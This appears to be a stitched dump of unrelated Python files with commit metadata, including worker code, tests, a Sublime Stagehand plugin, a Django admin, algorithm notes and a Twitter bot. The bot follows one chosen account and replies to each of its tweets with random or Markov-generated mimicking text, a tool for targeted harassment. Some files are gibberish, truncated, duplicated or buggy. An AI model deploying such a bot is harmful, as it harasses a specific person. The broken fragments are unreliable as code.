environ = queue.get()
# Log the request
LOG.notice("%d: Processing request %s" %
(pid, pprint.pformat(environ)))
# Process the request
response = self(environ)
# Log the response
LOG.notice("%d: Response code %s; headers %s; body %s" %
(pid, response.status,
pprint.pformat(response.headers), response.body))
@classmethod
def from_confitems(cls, items):
"""
Construct a ``TrainServer`` object from the configuration
items.
:param items: A list of ``(key, value)`` tuples describing the
configuration to feed to the Turnstile middleware.
:returns: An instance of ``TrainServer``.
"""
local_conf = dict(items)
filter = middleware.turnstile_filter({}, **local_conf)
return cls(filter)
def start_workers(queue, items, workers=1):
"""
Start the train workers. Each worker pops requests off the queue,
passes them through Turnstile, and logs the result.
:param queue: A queue object, implementing ``get()``.
:param items: A list of ``(key, value)`` tuples describing the
configuration to feed to the Turnstile middleware.
:param workers: The number of workers to create.
:returns: A list of process IDs of the workers.
"""
# Generate the server object
train_server = TrainServer.from_confitems(items)
launcher = util.Launcher(train_server.start, queue)
servers = []
for worker in range(workers):
# Launch the server
servers.append(launcher.start())
return servers
| Python | 0 | |
c8ad60f23bc630ba8e57f735c8aa0ec7eeaa3c1f | teste ggj18 | arquivo3.py | arquivo3.py | dasdsa
sdas
sdasd
asdasdas
s
dasdas
das
d
asd
as
das
das
das
d
sad
| Python | 0.000001 | |
c5bbbe4f6430ef20da55ea0f8039091d4f79c491 | Add script to update taking for all team owners | sql/branch.py | sql/branch.py | import sys
from gratipay import wireup
from gratipay.models.participant import Participant
db = wireup.db(wireup.env())
teams = db.all("""
SELECT t.*::teams
FROM teams t
""")
for team in teams:
print("Updating team %s" % team.slug)
Participant.from_username(team.owner).update_taking()
print("Done!")
| Python | 0 | |
74c58436c28fbca804cd70a88ca1250ca22aa8e6 | add test_poll.py | tests/unit/concurrently/condor/test_poll.py | tests/unit/concurrently/condor/test_poll.py | # Tai Sakuma <tai.sakuma@gmail.com>
import os
import sys
import logging
import textwrap
import collections
import pytest
try:
import unittest.mock as mock
except ImportError:
import mock
from alphatwirl.concurrently import WorkingArea
from alphatwirl.concurrently import HTCondorJobSubmitter
##__________________________________________________________________||
@pytest.fixture()
def mock_proc_condor_q():
ret = mock.Mock()
ret.returncode = 0
return ret
@pytest.fixture()
def mock_pipe(monkeypatch):
ret = mock.Mock()
module = sys.modules['alphatwirl.concurrently.exec_util']
monkeypatch.setattr(module.subprocess, 'PIPE', ret)
return ret
@pytest.fixture()
def mock_popen(monkeypatch, mock_proc_condor_q):
ret = mock.Mock()
ret.side_effect = [mock_proc_condor_q]
module = sys.modules['alphatwirl.concurrently.exec_util']
monkeypatch.setattr(module.subprocess, 'Popen', ret)
return ret
@pytest.fixture()
def obj(mock_popen):
return HTCondorJobSubmitter()
##__________________________________________________________________||
def test_poll(
obj, mock_popen, mock_pipe,
mock_proc_condor_q, caplog):
obj.clusterprocids_outstanding = ['3764857.0', '3764858.0', '3764858.1', '3764858.2']
stdout = '\n'.join(['3764857.0 2', '3764858.1 2', '3764858.2 1'])
mock_proc_condor_q.communicate.return_value = (stdout, '')
with caplog.at_level(logging.DEBUG):
ret = obj.poll()
# assert 6 == len(caplog.records)
#
assert ['3764857.0', '3764858.1', '3764858.2'] == obj.clusterprocids_outstanding
#
expected = ['3764858.0']
assert expected == ret
#
expected = [
['condor_q', '3764857', '3764858', '-format', '%d.', 'ClusterId', '-format', '%d ', 'ProcId', '-format', '%-2s\n', 'JobStatus']
]
procargs_list = [args[0] for args, kwargs in mock_popen.call_args_list]
assert expected == procargs_list
##__________________________________________________________________||
| Python | 0.00002 | |
9967ade200639b584e379ec25030d1598071ffd3 | Create TextEditor.py | redactor/TextEditor.py | redactor/TextEditor.py | from tkinter import *
class TextEditor():
def __init__(self):
self.root = Tk()
self.root.wm_title("BrickText")
self.text_panel = Text(self.root)
self.text_panel.pack(side=RIGHT, fill=BOTH, expand=YES)
self.set_tabs()
def start(self):
self.root.mainloop()
def get_root(self):
return self.root
def get_text_panel(self):
return self.text_panel
def set_tabs(self):
f = font.Font(font=self.text_panel['font'])
tab_width = f.measure(' ' * 3)
self.text_panel.config(tabs=(tab_width,))
| Python | 0.000001 | |
c037412566b0a0313216e49168a8ebcc831e0f9b | add hamshahri information extractor | hamshahri.py | hamshahri.py |
from hazm import sent_tokenize, word_tokenize, Normalizer, HamshahriReader, POSTagger, DependencyParser
from InformationExtractor import InformationExtractor
hamshahri = HamshahriReader('/home/alireza/Corpora/Hamshahri')
normalizer = Normalizer()
tagger = POSTagger()
parser = DependencyParser(tagger=tagger)
extractor = InformationExtractor()
output = open('informations.txt', 'w')
for text in hamshahri.texts():
text = normalizer.normalize(text)
sentences = [word_tokenize(sentence) for sentence in sent_tokenize(text)]
tagged = tagger.batch_tag(sentences)
parsed = parser.tagged_batch_parse(tagged)
for sentence in parsed:
print('\n', '*', *[node['word'] for node in sentence.nodelist if node['word']], file=output)
for information in extractor.extract(sentence):
print(*information, sep=' - ', file=output)
break
| Python | 0.000008 | |
4e68a99a24439966b0001af2fe0ecf4eae5bd0bf | fix #185 - integrate with stagehand | stagehand.py | stagehand.py | # Copyright (c) 2014, Guillermo López-Anglada. Please see the AUTHORS file for details.
# All rights reserved. Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.)
import sublime
import sublime_plugin
import os
from subprocess import check_output
from Dart.lib.fs_completion import FileSystemCompletion
from Dart.lib.sublime import after
from Dart.lib.sdk import SDK
from Dart.lib.plat import supress_window
from Dart.lib.collections import CircularArray
class DartStagehandWizard(sublime_plugin.WindowCommand):
options = [
'consoleapp',
'package',
'polymerapp',
'shelfapp',
'webapp',
]
def run(self):
self.window.show_quick_panel(DartStagehandWizard.options,
self.on_done)
def on_done(self, i):
if i == -1:
return
template = DartStagehandWizard.options[i]
self.window.run_command('dart_stagehand', {'template': template})
class DartStagehand(sublime_plugin.WindowCommand):
cancel_change_event = False
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def run(self, template=None):
if not template:
return
self.template = template
view = self.window.show_input_panel('', '',
self.on_done,
self.on_change,
self.on_cancel)
view.settings().set('gutter', False)
view.settings().set('rulers', None)
view.settings().set('is_vintageous_widget', True)
view.set_syntax_file('Packages/Dart/Support/Dart (File System Navigation).hidden-tmLanguage')
path = os.path.expanduser('~')
v = self.window.active_view()
if v and v.file_name():
path = os.path.dirname(v.file_name())
view.run_command('append', {'characters': path + '/'})
view.sel().clear()
view.sel().add(sublime.Region(view.size()))
DartCompleteFs.user_interaction = False
def on_done(self, s):
DartCompleteFs.cache = None
DartCompleteFs.index = 0
DartCompleteFs.user_interaction = False
if not self.check_installed():
self.install()
self.template = None
return
self.generate(s, self.template)
self.template = None
def on_change(self, s):
if DartStagehand.cancel_change_event:
DartStagehand.cancel_change_event = False
return
DartCompleteFs.user_interaction = True
def on_cancel(self):
DartCompleteFs.cache = None
DartCompleteFs.index = 0
DartCompleteFs.user_interaction = False
self.template = None
def check_installed(self):
sdk = SDK()
out = check_output([sdk.path_to_pub, 'global', 'list'],
startupinfo=supress_window())
return 'stagehand' in out.decode('utf-8')
def install(self):
sdk = SDK()
self.window.run_command('dart_exec', {
'cmd' :[sdk.path_to_pub, 'global', 'activate', 'stagehand'],
'preamble': "Installing stagehand... (This may take a few seconds.)\n"
})
def generate(self, path=None, template=None):
assert path and template, 'wrong call'
sdk = SDK()
self.window.run_command('dart_exec', {
'cmd' : [sdk.path_to_pub, 'global', 'run',
'stagehand', '-o', path, template],
'preamble': "Running stagehand...\n"
})
class DartCompleteFs(sublime_plugin.TextCommand):
cache = None
index = 0
user_interaction = False
fs_completer = None
locked_dir = ''
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
DartCompleteFs.fs_completer = FileSystemCompletion(
casesensitive=(sublime.platform() == 'linux'))
def run(self, edit):
path = self.view.substr(sublime.Region(0, self.view.size()))
if not DartCompleteFs.cache or DartCompleteFs.user_interaction:
DartCompleteFs.user_interaction = False
DartCompleteFs.index = 0
DartCompleteFs.locked_dir = os.path.dirname(path)
items = DartCompleteFs.fs_completer.get_completions(
path,
force_refresh=True)
DartCompleteFs.cache = CircularArray(items)
if len(DartCompleteFs.cache) == 0:
DartCompleteFs.index = 0
return
content = os.path.join(DartCompleteFs.locked_dir,
next(DartCompleteFs.cache))
self.view.erase(edit, sublime.Region(0, self.view.size()))
# Change event of input panel runs async, so make sure it knows this
# time it was a non-interactive change.
DartStagehand.cancel_change_event = True
self.view.run_command('append', {'characters': content})
self.view.sel().clear()
self.view.sel().add(sublime.Region(self.view.size()))
| Python | 0 | |
a7ece57eec28c771bcf2a23dc9c9e575223b1383 | add memory usage profiler script | proto/memory_test/calculate_rebot_model.py | proto/memory_test/calculate_rebot_model.py | # Copyright 2008-2011 Nokia Siemens Networks Oyj
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys, os
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..', 'src'))
from robot.result.builders import ResultFromXML
try:
import psutil
import objgraph
except ImportError:
print """
Please install psutil and objgraph - this script does not work without them.
"""
raise
def calculate_rebot_model(output_path):
xml = ResultFromXML(output_path)
p = psutil.Process(os.getpid())
print 'Process memory usage after xml parsing %f M' % (float(p.get_memory_info().rss) / (1024**2))
print 'Most common types'
objgraph.show_most_common_types()
return xml
if __name__ == '__main__':
if len(sys.argv) < 2:
print """
Simple memory profiler for robot output xml parsing.
Calculates memory usages after result model has been created.
usage:
calculate_rebot_model.py [PATH_TO_OUTPUT_XML]
"""
else:
calculate_rebot_model(sys.argv[1])
| Python | 0.000001 | |
680fb0bc3190acbb0bfd32f937d0e29b5641a1f2 | Create Strongly_Connect_Graph.py | Algorithm/Strongly_Connect_Graph.py | Algorithm/Strongly_Connect_Graph.py | # http://www.geeksforgeeks.org/strongly-connected-components/
# http://www.geeksforgeeks.org/connectivity-in-a-directed-graph/
'''
Given a directed graph, find out whether the graph is strongly connected or not. A directed graph is strongly connected if there is a path between any two pair of vertices. For example, following is a strongly connected graph.
`对于无向图来说判断连通非常简单,只需要做一次搜索,然后判断路径中是否经过了每个节点即可。但是有向图不可以这么做,比如上图,从节点0开始搜索可以经过所有节点,但是很明显它不是strongly connected。
Naive的方法是,对每一个节点做一次DFS,如果存在一个节点在DFS中没有经过每一个节点,那么则不是强连通图。这个算法复杂度是O(V*(V+E))。
或者用Floyd Warshall算法来找出任意两个节点的最短路径。复杂度是O(v3)。
一个更好的办法是强连通分量算法Strongly Connected Components (SCC) algorithm。我们可以用O(V+E)时间复杂度找出一个图中所有的SCC。如果SCC只有一个,那么这个图就是强连通图。
用Kosaraju算法,两个pass做DFS:
开一个visited数组,标记所有点为unvisited.
从任意顶点V走一次DFS,如果没有访问到所有顶点则返回false。
将所有边reverse。
把reverse后的图的所有定点重新标记为unvisited。
继续对新图走一次DFS,起点跟2中的顶点V。如果DFS没有访问到所有点则返回false,否则返回true。
'''
| Python | 0.000001 | |
2e985972aa4aad94bfda25ba852326b39498e4fa | Create Unique_Binary_Search_Trees.py | Array/Unique_Binary_Search_Trees.py | Array/Unique_Binary_Search_Trees.py | Given n, how many structurally unique BST's (binary search trees) that store values 1...n?
For example,
Given n = 3, there are a total of 5 unique BST's.
1 3 3 2 1
\ / / / \ \
3 2 1 1 3 2
/ / \ \
2 1 2 3
class Solution:
# @return an integer
# Recursion (172ms)
def numTrees_1(self, n):
if n <= 1: return 1
result = 0
for i in xrange(1,n+1):
result += self.numTrees(i-1)*self.numTrees(n-i)
return result
# DP (46ms)
def numTrees(self, n):
result = [0 for i in xrange(n+1)]
result[0] = 1; result[1] = 1
for i in xrange(2, n+1):
for j in xrange(1, n+1):
result[i] += result[j-1]*result[i-j]
return result[n]
# status: result[i]: the number of unique BST for a sequence of length i.
# initialize: result[0]= 1; result[1] = 1, only one combination to construct a BST out of a sequence
# function:
result[n] = F(1,n) + F[2,n] +...F[n,n]
F[i, n]: the number of unique BST, where the number i is the root of BST, and the sequence ranges from 1 to n.
F[i, n] = result[i-1] * result[n-i] 1<= i <= n
result[n] = result[0]*result[n-1] + result[1]*result[n-2]+..+result[n-1]*result[0]
# result: result[n]
| Python | 0.000001 | |
cd59d45813fbc23d76e1e9d12cf46d7df37d72c3 | Add remote_fs unittest (#410) | test/unit/webdriver/device/remote_fs_test.py | test/unit/webdriver/device/remote_fs_test.py | #!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import httpretty
import pytest
from selenium.common.exceptions import InvalidArgumentException
from appium.common.helper import appium_bytes
from appium.webdriver.webdriver import WebDriver
from test.unit.helper.test_helper import (
android_w3c_driver,
appium_command,
get_httpretty_request_body
)
class TestWebDriverRemoteFs(object):
@httpretty.activate
def test_push_file(self):
driver = android_w3c_driver()
httpretty.register_uri(
httpretty.POST,
appium_command('/session/1234567890/appium/device/push_file'),
)
dest_path = '/path/to/file.txt'
data = base64.b64encode(appium_bytes('HelloWorld', 'utf-8')).decode('utf-8')
assert isinstance(driver.push_file(dest_path, data), WebDriver)
d = get_httpretty_request_body(httpretty.last_request())
assert d['path'] == dest_path
assert d['data'] == str(data)
@httpretty.activate
def test_push_file_invalid_arg_exception_without_src_path_and_base64data(self):
driver = android_w3c_driver()
httpretty.register_uri(
httpretty.POST,
appium_command('/session/1234567890/appium/device/push_file'),
)
dest_path = '/path/to/file.txt'
with pytest.raises(InvalidArgumentException):
driver.push_file(dest_path)
@httpretty.activate
def test_push_file_invalid_arg_exception_with_src_file_not_found(self):
driver = android_w3c_driver()
httpretty.register_uri(
httpretty.POST,
appium_command('/session/1234567890/appium/device/push_file'),
)
dest_path = '/dest_path/to/file.txt'
src_path = '/src_path/to/file.txt'
with pytest.raises(InvalidArgumentException):
driver.push_file(dest_path, source_path=src_path)
@httpretty.activate
def test_pull_file(self):
driver = android_w3c_driver()
httpretty.register_uri(
httpretty.POST,
appium_command('/session/1234567890/appium/device/pull_file'),
body='{"value": "SGVsbG9Xb3JsZA=="}'
)
dest_path = '/path/to/file.txt'
assert driver.pull_file(dest_path) == str(base64.b64encode(appium_bytes('HelloWorld', 'utf-8')).decode('utf-8'))
d = get_httpretty_request_body(httpretty.last_request())
assert d['path'] == dest_path
@httpretty.activate
def test_pull_folder(self):
driver = android_w3c_driver()
httpretty.register_uri(
httpretty.POST,
appium_command('/session/1234567890/appium/device/pull_folder'),
body='{"value": "base64EncodedZippedFolderData"}'
)
dest_path = '/path/to/file.txt'
assert driver.pull_folder(dest_path) == 'base64EncodedZippedFolderData'
d = get_httpretty_request_body(httpretty.last_request())
assert d['path'] == dest_path
| Python | 0 | |
e2ba20d629fb35225140008437ddd93bcf516ba7 | Add translation for action short descriptions | django_mailbox/admin.py | django_mailbox/admin.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Model configuration in application ``django_mailbox`` for administration
console.
"""
import logging
from django.conf import settings
from django.contrib import admin
from django.utils.translation import ugettext_lazy as _
from django_mailbox.models import MessageAttachment, Message, Mailbox
from django_mailbox.signals import message_received
from django_mailbox.utils import convert_header_to_unicode
logger = logging.getLogger(__name__)
def get_new_mail(mailbox_admin, request, queryset):
for mailbox in queryset.all():
logger.debug('Receiving mail for %s' % mailbox)
mailbox.get_new_mail()
get_new_mail.short_description = _('Get new mail')
def resend_message_received_signal(message_admin, request, queryset):
for message in queryset.all():
logger.debug('Resending \'message_received\' signal for %s' % message)
message_received.send(sender=message_admin, message=message)
resend_message_received_signal.short_description = (
_('Re-send message received signal')
)
class MailboxAdmin(admin.ModelAdmin):
list_display = (
'name',
'uri',
'from_email',
'active',
'last_polling',
)
readonly_fields = ['last_polling', ]
actions = [get_new_mail]
class MessageAttachmentAdmin(admin.ModelAdmin):
raw_id_fields = ('message', )
list_display = ('message', 'document',)
class MessageAttachmentInline(admin.TabularInline):
model = MessageAttachment
extra = 0
class MessageAdmin(admin.ModelAdmin):
def attachment_count(self, msg):
return msg.attachments.count()
attachment_count.short_description = _('Attachment count')
def subject(self, msg):
return convert_header_to_unicode(msg.subject)
def envelope_headers(self, msg):
email = msg.get_email_object()
return '\n'.join(
[('%s: %s' % (h, v)) for h, v in email.items()]
)
inlines = [
MessageAttachmentInline,
]
list_display = (
'subject',
'processed',
'read',
'mailbox',
'outgoing',
'attachment_count',
)
ordering = ['-processed']
list_filter = (
'mailbox',
'outgoing',
'processed',
'read',
)
exclude = (
'body',
)
raw_id_fields = (
'in_reply_to',
)
readonly_fields = (
'envelope_headers',
'text',
'html',
)
actions = [resend_message_received_signal]
if getattr(settings, 'DJANGO_MAILBOX_ADMIN_ENABLED', True):
admin.site.register(Message, MessageAdmin)
admin.site.register(MessageAttachment, MessageAttachmentAdmin)
admin.site.register(Mailbox, MailboxAdmin)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Model configuration in application ``django_mailbox`` for administration
console.
"""
import logging
from django.conf import settings
from django.contrib import admin
from django_mailbox.models import MessageAttachment, Message, Mailbox
from django_mailbox.signals import message_received
from django_mailbox.utils import convert_header_to_unicode
logger = logging.getLogger(__name__)
def get_new_mail(mailbox_admin, request, queryset):
for mailbox in queryset.all():
logger.debug('Receiving mail for %s' % mailbox)
mailbox.get_new_mail()
get_new_mail.short_description = 'Get new mail'
def resend_message_received_signal(message_admin, request, queryset):
for message in queryset.all():
logger.debug('Resending \'message_received\' signal for %s' % message)
message_received.send(sender=message_admin, message=message)
resend_message_received_signal.short_description = (
'Re-send message received signal'
)
class MailboxAdmin(admin.ModelAdmin):
list_display = (
'name',
'uri',
'from_email',
'active',
'last_polling',
)
readonly_fields = ['last_polling', ]
actions = [get_new_mail]
class MessageAttachmentAdmin(admin.ModelAdmin):
raw_id_fields = ('message', )
list_display = ('message', 'document',)
class MessageAttachmentInline(admin.TabularInline):
model = MessageAttachment
extra = 0
class MessageAdmin(admin.ModelAdmin):
def attachment_count(self, msg):
return msg.attachments.count()
def subject(self, msg):
return convert_header_to_unicode(msg.subject)
def envelope_headers(self, msg):
email = msg.get_email_object()
return '\n'.join(
[('%s: %s' % (h, v)) for h, v in email.items()]
)
inlines = [
MessageAttachmentInline,
]
list_display = (
'subject',
'processed',
'read',
'mailbox',
'outgoing',
'attachment_count',
)
ordering = ['-processed']
list_filter = (
'mailbox',
'outgoing',
'processed',
'read',
)
exclude = (
'body',
)
raw_id_fields = (
'in_reply_to',
)
readonly_fields = (
'envelope_headers',
'text',
'html',
)
actions = [resend_message_received_signal]
if getattr(settings, 'DJANGO_MAILBOX_ADMIN_ENABLED', True):
admin.site.register(Message, MessageAdmin)
admin.site.register(MessageAttachment, MessageAttachmentAdmin)
admin.site.register(Mailbox, MailboxAdmin)
| Python | 0.000001 |
f23c77d517dd88c38d5ad8fa0601bc61ccf17aa6 | Change url from 2016 to 2017 | pyconcz_2017/urls.py | pyconcz_2017/urls.py | from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from django.views.generic import TemplateView, RedirectView
from pyconcz_2017.common.views import homepage
prefixed_urlpatterns = [
url(r'^$', homepage, name='homepage'),
url(r'^announcements/', include('pyconcz_2017.announcements.urls')),
url(r'^proposals/workshops/$', RedirectView.as_view(url='/2017/proposals/talks')),
url(r'^proposals/', include('pyconcz_2017.proposals.urls')),
url(r'^about/team/', include('pyconcz_2017.team.urls')),
url(r'^speakers/', include('pyconcz_2017.speakers.urls')),
url(r'^sponsors/', include('pyconcz_2017.sponsors.urls')),
# static pages
url(r'^about/$',
TemplateView.as_view(template_name='pages/about.html'),
name='about'),
url(r'^about/code/$',
TemplateView.as_view(template_name='pages/code.html'),
name='about_code'),
url(r'^about/transparency_report/$',
TemplateView.as_view(template_name='pages/transparency.html'),
name='about_transparency'),
url(r'^about/brno/$',
TemplateView.as_view(template_name='pages/brno.html'),
name='about_brno'),
]
urlpatterns = (
static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) +
static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) +
[
url(r'^2017/', include(prefixed_urlpatterns)),
url(r'^admin/', include(admin.site.urls)),
url(r'^$', RedirectView.as_view(url='/2017/')),
]
)
if settings.DEBUG:
import debug_toolbar
urlpatterns += [
url(r'^__debug__/', include(debug_toolbar.urls)),
]
| from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from django.views.generic import TemplateView, RedirectView
from pyconcz_2017.common.views import homepage
prefixed_urlpatterns = [
url(r'^$', homepage, name='homepage'),
url(r'^announcements/', include('pyconcz_2017.announcements.urls')),
url(r'^proposals/workshops/$', RedirectView.as_view(url='/2016/proposals/talks')),
url(r'^proposals/', include('pyconcz_2017.proposals.urls')),
url(r'^about/team/', include('pyconcz_2017.team.urls')),
url(r'^speakers/', include('pyconcz_2017.speakers.urls')),
url(r'^sponsors/', include('pyconcz_2017.sponsors.urls')),
# static pages
url(r'^about/$',
TemplateView.as_view(template_name='pages/about.html'),
name='about'),
url(r'^about/code/$',
TemplateView.as_view(template_name='pages/code.html'),
name='about_code'),
url(r'^about/transparency_report/$',
TemplateView.as_view(template_name='pages/transparency.html'),
name='about_transparency'),
url(r'^about/brno/$',
TemplateView.as_view(template_name='pages/brno.html'),
name='about_brno'),
]
urlpatterns = (
static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) +
static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) +
[
url(r'^2016/', include(prefixed_urlpatterns)),
url(r'^admin/', include(admin.site.urls)),
url(r'^$', RedirectView.as_view(url='/2016/')),
]
)
if settings.DEBUG:
import debug_toolbar
urlpatterns += [
url(r'^__debug__/', include(debug_toolbar.urls)),
]
| Python | 0.999212 |
5becb57514c4b08fc7af2a9a4e38b2c8aac2f576 | Create computestats.py | effective_quadratures/computestats.py | effective_quadratures/computestats.py | #!/usr/bin/env python
import numpy as np
from utils import error_function
class Statistics(object):
"""
This subclass is an domains.ActiveVariableMap specifically for optimization.
**See Also**
optimizers.BoundedMinVariableMap
optimizers.UnboundedMinVariableMap
**Notes**
This class's train function fits a global quadratic surrogate model to the
n+2 active variables---two more than the dimension of the active subspace.
This quadratic surrogate is used to map points in the space of active
variables back to the simulation parameter space for minimization.
"""
# constructor
def __init__(self, coefficients, index_set):
self.coefficients = coefficients
self.index_set = index_set
def getMean(self):
"""
Train the global quadratic for the regularization.
:param ndarray Y: N-by-n matrix of points in the space of active
variables.
:param int N: merely there satisfy the interface of `regularize_z`. It
should not be anything other than 1.
:return: Z, N-by-(m-n)-by-1 matrix that contains a value of the inactive
variables for each value of the inactive variables.
:rtype: ndarray
**Notes**
In contrast to the `regularize_z` in BoundedActiveVariableMap and
UnboundedActiveVariableMap, this implementation of `regularize_z` uses
a quadratic program to find a single value of the inactive variables
for each value of the active variables.
"""
coefficients = self.coefficients
mean = coefficients[0,0]
return mean
def getVariance(self):
coefficients = self.coefficients
m, n = coefficients.shape
if m > n:
coefficients = coefficients.T
variance = np.sum(coefficients[0][1:m]**2)
return variance
# Function that computes first order Sobol' indices
def getFirstOrderSobol(self):
coefficients = self.coefficients
m, n = coefficients.shape
if m > n:
coefficients = coefficients.T
index_set = self.index_set
# Allocate memory!
index_set = index_set.getIndexSet()
index_set = np.mat(index_set)
m, dimensions = index_set.shape
variance = self.getVariance()
if dimensions == 1:
utils.error_function('ERROR: Sobol indices can only be computed for parameter studies with more than one parameter')
else:
index_set_entries = m
local_variance = np.zeros((index_set_entries, dimensions))
first_order_sobol_indices = np.zeros((dimensions))
# Loop for computing marginal variances!
for j in range(0, dimensions):
for i in range(0, index_set_entries): # no. of rows
# If the index_set[0,j] is not zero but the remaining are...
remaining_indices = np.arange(0, dimensions)
remaining_indices = np.delete(remaining_indices, j)
if(index_set[i,j] != 0 and np.sum(index_set[i, remaining_indices] ) == 0):
local_variance[i, j] = coefficients[0][i]
# Now take the sum of the squares of all the columns
for j in range(0, dimensions):
first_order_sobol_indices[j] = (np.sum(local_variance[:,j]**2))/(variance)
return first_order_sobol_indices
| Python | 0.000017 | |
36d0fc3c54dc0c91196c16875c1b1e2d9b0d38ea | Add basic unit test for LimitOffsetPagination | example/tests/unit/test_pagination.py | example/tests/unit/test_pagination.py | from collections import OrderedDict
from rest_framework.request import Request
from rest_framework.test import APIRequestFactory
from rest_framework.utils.urls import replace_query_param
from rest_framework_json_api.pagination import LimitOffsetPagination
factory = APIRequestFactory()
class TestLimitOffset:
"""
Unit tests for `pagination.LimitOffsetPagination`.
"""
def setup(self):
class ExamplePagination(LimitOffsetPagination):
default_limit = 10
max_limit = 15
self.pagination = ExamplePagination()
self.queryset = range(1, 101)
self.base_url = 'http://testserver/'
def paginate_queryset(self, request):
return list(self.pagination.paginate_queryset(self.queryset, request))
def get_paginated_content(self, queryset):
response = self.pagination.get_paginated_response(queryset)
return response.data
def get_test_request(self, arguments):
return Request(factory.get('/', arguments))
def test_valid_offset_limit(self):
"""
Basic test, assumes offset and limit are given.
"""
offset = 10
limit = 5
count = len(self.queryset)
last_offset = count - limit
next_offset = 15
prev_offset = 5
request = self.get_test_request({
self.pagination.limit_query_param: limit,
self.pagination.offset_query_param: offset
})
base_url = replace_query_param(self.base_url, self.pagination.limit_query_param, limit)
last_url = replace_query_param(base_url, self.pagination.offset_query_param, last_offset)
first_url = base_url
next_url = replace_query_param(base_url, self.pagination.offset_query_param, next_offset)
prev_url = replace_query_param(base_url, self.pagination.offset_query_param, prev_offset)
queryset = self.paginate_queryset(request)
content = self.get_paginated_content(queryset)
next_offset = offset + limit
expected_content = {
'results': list(range(offset + 1, next_offset + 1)),
'links': OrderedDict([
('first', first_url),
('last', last_url),
('next', next_url),
('prev', prev_url),
]),
'meta': {
'pagination': OrderedDict([
('count', count),
('limit', limit),
('offset', offset),
])
}
}
assert queryset == list(range(offset + 1, next_offset + 1))
assert content == expected_content
| Python | 0 | |
1eed076cc9140d35cd6897ef2bcb5fe0ae943e35 | Revert "remove bindings" | binding.gyp | binding.gyp | {
'targets': [
{
'target_name': 'sysinfo',
'conditions': [
['OS=="solaris"', {
'sources': [
'src/solaris.cpp'
]
}]
],
'sources': [
'src/binding.cpp',
],
'linkflags': [
'-Lbuild/cd Release/obj.target/sysinfo/src/'
],
'defines': [
'OS="<(OS)"',
'is_<(OS)'
],
}
]
}
| Python | 0 | |
9a83e01b9710943c50f80c8ffc4e5d5827cb3b92 | Check data preparation | main.py | main.py | from car_classifier import CarClassifier
if __name__ == "__main__":
car_img_dir = 'vehicles'
not_car_img_dir = 'non-vehicles'
sample_size = 8792
car_classifier = CarClassifier(car_img_dir=car_img_dir,
not_car_img_dir=not_car_img_dir,
sample_size = sample_size)
car_classifier.fit()
| Python | 0.000027 | |
5314f764dcfc62b3ec3fd29fdd86ae08dddfe08d | fix typo | main.py | main.py | import sys
from time import ctime
from tweepy import API
from tweepy import Stream
from tweepy import OAuthHandler
from tweepy.streaming import StreamListener
from credentials import *
from tweepy.utils import import_simplejson
import markovify
import random
import argparse
json = import_simplejson()
class Listener(StreamListener):
def __init__(self, api, followed_user_id, followed_user_handle, mock_mode):
super().__init__(api)
self.tweet_data = []
self.followed_user_id = followed_user_id
self.followed_user_handle = followed_user_handle
self.mock_mode = mock_mode
self.reply_list = []
self.next_reply = ''
self.load_next_reply(mock_mode)
def on_error(self, error):
print("Returned error code %s" % error)
return False
def on_status(self, status):
if status.user.id == self.followed_user_id:
tweet_text = '@%s %s' % (self.followed_user_handle, self.next_reply)
self.api.update_status(tweet_text)
print('%s: Tweeted:' % (ctime(), tweet_text))
if self.mock_mode:
self.update_mock_text(status.text)
self.load_next_reply(self.mock_mode)
def load_next_reply(self, mock=False):
if not mock:
with open('reply_list.txt', 'r') as reply_list_file:
self.reply_list = reply_list_file.readlines()
self.next_reply = random.choice(self.reply_list)
else:
with open('user_tweet_history.txt') as user_tweet_history_file:
text = user_tweet_history_file.read()
text_model = markovify.Text(text)
self.next_reply = text_model.make_short_sentence(140)
@staticmethod
def update_mock_text(text):
with open('user_tweet_history.txt', 'wa') as user_tweet_history_fd:
user_tweet_history_fd.write(text)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--handle',
required=True,
type=str,
dest='followed_handle',
action='store',
help='Twitter handle (without @)')
parser.add_argument('--mock',
dest='mock_mode',
default=False,
action='store_true',
help='enable mock mode')
args = parser.parse_args()
auth = OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)
api = API(auth)
found_users = api.lookup_users(screen_names=[str(args.followed_handle)])
print found_users
if len(found_users) != 1:
print('Lookup for twitter handle %s failed' % args.followed_handle)
sys.exit()
followed_user_id = found_users[0].id
print followed_user_id
twitterStream = Stream(auth, Listener(api, followed_user_id, args.followed_handle, args.mock_mode))
twitterStream.filter(follow=[str(followed_user_id)], async=True)
| import sys
from time import ctime
from tweepy import API
from tweepy import Stream
from tweepy import OAuthHandler
from tweepy.streaming import StreamListener
from credentials import *
from tweepy.utils import import_simplejson
import markovify
import random
import argparse
json = import_simplejson()
class Listener(StreamListener):
def __init__(self, api, followed_user_id, followed_user_handle, mock_mode):
super().__init__(api)
self.tweet_data = []
self.followed_user_id = followed_user_id
